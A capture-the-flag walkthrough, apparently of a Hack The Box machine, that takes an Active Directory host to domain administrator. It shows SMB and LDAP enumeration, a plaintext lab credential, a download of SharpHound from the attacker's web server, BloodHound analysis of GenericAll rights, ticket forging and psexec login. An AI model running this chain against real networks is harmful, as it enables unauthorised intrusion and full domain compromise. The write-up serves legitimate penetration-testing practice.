This machine was quite interesting. The initial foothold requires us to analyse using wireshark. Something I haven’t practiced as much as other tools since beginning my OSCP journey. You must also be patient and have a keen eye for detail to find the password for support after you have enumerated using LDAP. All in all, it was a good practice for skills I will for sure need.
1. Let’s start this machine off with an nmap scan. There are quite a few interesting ports open and the best bet is to enumerate one by one. I personally like to start with SMB enumeration in this case.
sudo nmap -p- 10.10.11.174 -sC -sV
2. Quick enumeration of smb shares using crackmapexec shows us the list of shares that we can possibly view using smbclient.
crackmapexec smb 10.10.11.174 -u 'test' -p '' - shares
3. We see the support-tools share that looks interesting. We should use smbclient to enumerate this share using an anonymous session and see what we can find.
4. From this list of executables we notice that only UserInfo is not a widely used software (most likely self developed). So we download it and see what we can find.
5. We can use wine to run this application and we get a help menu to see how we can utilise it. If wine doesn’t work you might need to download wine mono.
6. We get a connect error when we try to run the find command. We can use wireshark to investigate this. From this analysis after running the application we can see that there are credentials in plaintext for the user ldap. We can use these credentials to perform ldap enumeration and see what else we can find.
7. Running this command:
ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16¹aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"We get a boatload of information that we have to sift through. But with great eyesight we will stumble across user credentials for the support account in the info category.
8. We can now login to the support user using evil-winrm and get the user.txt credentials.
9. We can download SharpHound using this command:
iwr -uri http://<kali_ip>:8000/SharpHound.exe -Outfile SharpHound.exeBut you must also have a python web server running. You can do this with this command:
python3 -m http.server 8000When we run SharpHound we just need to transfer the zip file back to our machine. We can do this using evil-winrm’s download function (really and truly we also could have used evil-winrm to upload sharphound).
10. Once the BloodHound zip file has been transferred and neo4j is running we can upload the zip file to Bloodhound and investigate.
11. Once the support user is marked as owned and we select Group Delegated Object Control. We see that the support user is a member of the Shared Support Account group which has GenericAll privileges on the Domain Controller.
12. If we right-click the GenericAll connection we can click the help to see how we can exploit this.
13. Following the help word for word and changing the last command to suit our domain will allow us to create a ticket for the administrator user.
14. If you have a problem with the imported ticket you can also just copy it to your attacker machine and use Impacket-ticketConverter to convert it to a .ccache ticket (after you have decoded it from base64).
15. All you now need to do is use psexec to log into the administrator account using the ticket you just converted. Once you are in you can just find the root.txt flag.
